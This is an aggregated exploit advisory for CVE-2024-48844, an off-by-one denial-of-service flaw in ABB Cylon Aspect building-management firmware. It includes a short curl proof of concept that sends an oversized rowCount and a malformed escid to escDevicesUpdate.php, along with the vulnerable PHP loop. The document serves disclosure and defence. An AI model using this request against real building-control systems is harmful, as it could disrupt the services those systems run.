ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)

🗓️ 15 Apr 2025 00:00:00Reported by LiquidWormType

exploitdb🔗 www.exploit-db.com👁 267 Views

Denial of Service vulnerability found in ABB Cylon Aspect 3.08.02 affecting specific series.

Reporter	Title	Published	Views	Family All 13
0day.today	ABB Cylon Aspect 3.08.02 escDevicesUpdate.php Denial of Service Vulnerability	9 Jan 202500:00	–	zdt
Circl	CVE-2024-48844	5 Dec 202413:07	–	circl
CNNVD	ABB ASPECT 安全漏洞	5 Dec 202400:00	–	cnnvd
CVE	CVE-2024-48844	5 Dec 202412:41	–	cve
Cvelist	CVE-2024-48844 Denial of Service, DoS	5 Dec 202412:41	–	cvelist
EUVD	EUVD-2024-43199	3 Oct 202520:07	–	euvd
NCSC	Vulnerabilities fixed in ABB ASPECT, NEXUS Series and MATRIX Series	6 Dec 202411:49	–	ncsc
NVD	CVE-2024-48844	5 Dec 202413:15	–	nvd
OSV	CVE-2024-48844	5 Dec 202413:15	–	osv
Positive Technologies	PT-2024-9203 · Abb · Abb Aspect +2	5 Dec 202400:00	–	ptsecurity

ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) Off-by-One Config Write DoS


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: A vulnerability was identified in a PHP script where an off-by-one
error in array access could lead to undefined behavior and potential DoS.
The issue arises in a loop that iterates over an array using a < condition,
allowing access to an out-of-bounds index. This can trigger errors or unexpected
behavior when processing data, potentially crashing the application. Successful
exploitation of this vulnerability can lead to a crash or disruption of service,
especially if the script handles large data sets. This issue can be triggered
via the rowCount POST parameter in the Electronic Security Control device update
script.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5902
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5902.php
CVE ID: CVE-2024-48844
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48844


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl http://192.168.73.31/escDevicesUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2511531337&\
> escid1=192.168.1.1&\
> remove1=0&\
> escid2=192.168.1.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&\
> remove2=0&\
> etc.
> etc.


$ cat escDevicesUpdate.php
...
...
$ini = INI::read($comproperties);

unset($ini['comm']['esc-ip-addr']);

$rowCount = $_POST['rowCount'];

for ($i = 1; $i < $rowCount; $i++) {
    $fieldEscid = "escid" . $i;
    $fieldRemove = "remove" . $i;
    if ($_POST[$fieldRemove] != 1) {
        $escid = trim($_POST[$fieldEscid]);
        $ini['comm']['esc-ip-addr'][$i] = $escid;
    }
}

if (!INI::write($comproperties, $ini)) {
    logWarning("ESC device listt modification FAILED");
    $myLine = __LINE__;
    errorCall($myLine);
}
...

15 Apr 2025 00:00Current

7High risk

Vulners AI Score7

CVSS 3.16.5 - 7.7

CVSS 47.2

EPSS0.08272

SSVC